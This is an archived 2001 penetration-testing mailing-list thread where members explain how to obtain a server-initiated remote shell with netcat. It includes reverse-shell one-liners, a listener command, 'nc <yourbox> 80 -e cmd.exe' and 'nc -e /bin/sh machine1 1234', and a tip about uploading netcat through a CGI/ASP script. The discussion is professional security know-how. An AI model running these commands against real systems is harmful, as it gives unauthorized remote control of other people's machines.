> -----Original Message----- > From: Greg Ardpic [mailto:itbat_private] > Sent: Saturday, September 22, 2001 14:52 > To: pen-testat_private > Subject: Re: Server initiated remote shell > > > On Fri, 21 Sep 2001, Bill Pennington wrote: > > You want netcat, you can find in on packetstorm. > > > > What you will need to do first is build an CGI/ASP script > to upload your > > code, assuming you can't just tftp it from the internal system. > > > > Then on your box execute: > > > > nc -l -p 80 > > > > On the remote server execute > > > > nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or > > whatever command interpeter is handy. You will then see a > command prompt > > appear on your local box. > > > > Sounds like the hard part will be getting netcat on the > box. Good luck! > > > > Does this works on unix machines? I have compiled netcat with > -DGAPING_SECURITY_HOLE (so i could use the -e switch) but had no luck. > Trivially easy: On machine1 (windows in this case) nc -lp 1234 On machine2 (unix in this case) nc -e /bin/sh machine1 1234 That's really all there is to it. Machine1 could be unix too, with no change in the commands. Best Regards, Yonatan Bokovza IT Security Consultant Xpert Systems ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Sun Sep 23 2001 - 11:01:19 PDT